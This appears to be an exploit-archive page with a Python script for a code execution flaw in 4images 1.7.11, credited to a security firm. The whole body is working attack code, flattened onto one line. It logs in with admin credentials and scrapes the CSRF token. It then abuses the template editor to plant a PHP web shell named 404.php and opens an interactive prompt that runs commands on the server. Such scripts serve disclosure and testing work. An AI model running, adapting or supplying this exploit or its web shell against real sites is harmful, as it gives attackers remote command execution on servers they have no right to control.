4images 1.7.11: Code Execution Exploit

4images 1.7.11: Code Execution Exploit

Date: 2015-12-02 16:20:32
#!/usr/local/bin/python # Exploit for 4images 1.7.11 Code Execution vulnerability # An admin account is required to use this exploit # curesec GmbH import sys import re import argparse import requests # requires requests lib parser = argparse.ArgumentParser() parser.add_argument("url", help="base url to vulnerable site") parser.add_argument("username", help="admin username") parser.add_argument("password", help="admin password") args = parser.parse_args() url = args.url username = args.username password = args.password loginPath = "/admin/index.php" fileManagerPath = "/admin/templates.php" shellFileName = "404.php" shellContent = "<?php passthru($_GET['x']); ?>" def login(requestSession, url, username, password): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password} loginResult = requestSession.post(url, data = postData).text return "loginpassword" not in loginResult def upload(requestSession, url, fileName, fileContent): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"} loginResult = requestSession.post(url, data = postData).text def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text) command = raw_input("$ ") requestSession = requests.session() if login(requestSession, url + loginPath, username, password): print("successful: login") else: exit("ERROR: Incorrect username or password") upload(requestSession, url + fileManagerPath, shellFileName, shellContent) runShell(url + "/templates/default/" + shellFileName + "?x=")